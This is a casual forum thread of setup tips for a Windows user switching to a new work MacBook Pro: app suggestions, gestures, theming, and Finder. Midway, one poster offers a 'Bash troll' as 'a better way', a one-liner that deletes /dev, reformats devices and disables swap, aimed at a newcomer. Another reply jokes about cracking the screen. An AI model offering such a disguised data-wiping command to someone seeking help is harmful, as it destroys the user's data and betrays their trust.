Just Got a Mac - Little Help Por Favor

So just got a new job and was handed a brand spanking new Macbook Pro.

Always been a Windows dude so I'm looking for some general help, tips, set up/maneuver help.

Cheers to the Mac lovers that contribute.
 
everything is the same, but you hit the command button instead of CTRL.

but not really everything.
 
Drop it on its side to crack the screen a little and make a little finger skate booter near the mousepad. That's what I did and I don't regret it.
 
Necessitates:

Download Google Chrome to replace Safari

Learn all of the swiping techniques (should have been an intro about this when you first started it up)

If you want to be creative with it:

Download Nocturne, Caffeine, Geektool, and LiteIcon.

Delete the Dashboard, it's dumb

Make your iTunes black

Change the login image

Create a personal Terms of Agreement before the login screen that people have to agree to before logging into your computer

^^^thats boss, i dont know anyone getting that kinda benefit, but then again im not from sqauresville where everyone has college degrees and skrill from mom an pops

i dont know any ceo's that can drink a 40oz and shred gnar nor do i know anyone that pounds 40oz and shreds gnar that is a ceo, not the best example, but from my point of view everything equals out
 
psh. Like this is babby's first Bash troll. Basically it reformats the first two partitions (boot and /), wipes the /sys/ drives sysfs system, clears the swap RAM, and finishes.

a better way of doing it would be

su -C rm -rf /dev/*; while(1); newfs /dev/*; swapoff /dev/*; done
 
There is, the benefit to Caffeine is you can toggle between it dimming after a while and staying lit forever with a simply click of the icon on the menu bar instead of having to go through your system preferences.
 
SEM Lead

Essentially PPC and SEO but they decided to use the date SEM term.

Cheers for the advice ya'll - got most of the recommended shit down but a few recommendations are new.
 
downloaded the file but little confused on what to do with the files and which ones to use to make iTunes black....instructions in the downloaded file are extremely vague.
 
the instructions are talking about the other files, click on red blue or white and then drag the files into each other like it says in the instructions

its very much the same, its just that there's no start menu. So what you use is "finder".

the app i have up there connected with facebook is called Menutab, youll find it in appstore. Also i have shuttie, caffeine, cloud, mindnode, FCPx, all is from appstore except FCPx. check them out... Also reccomend getting vuze for downloading stuff. g'dluck
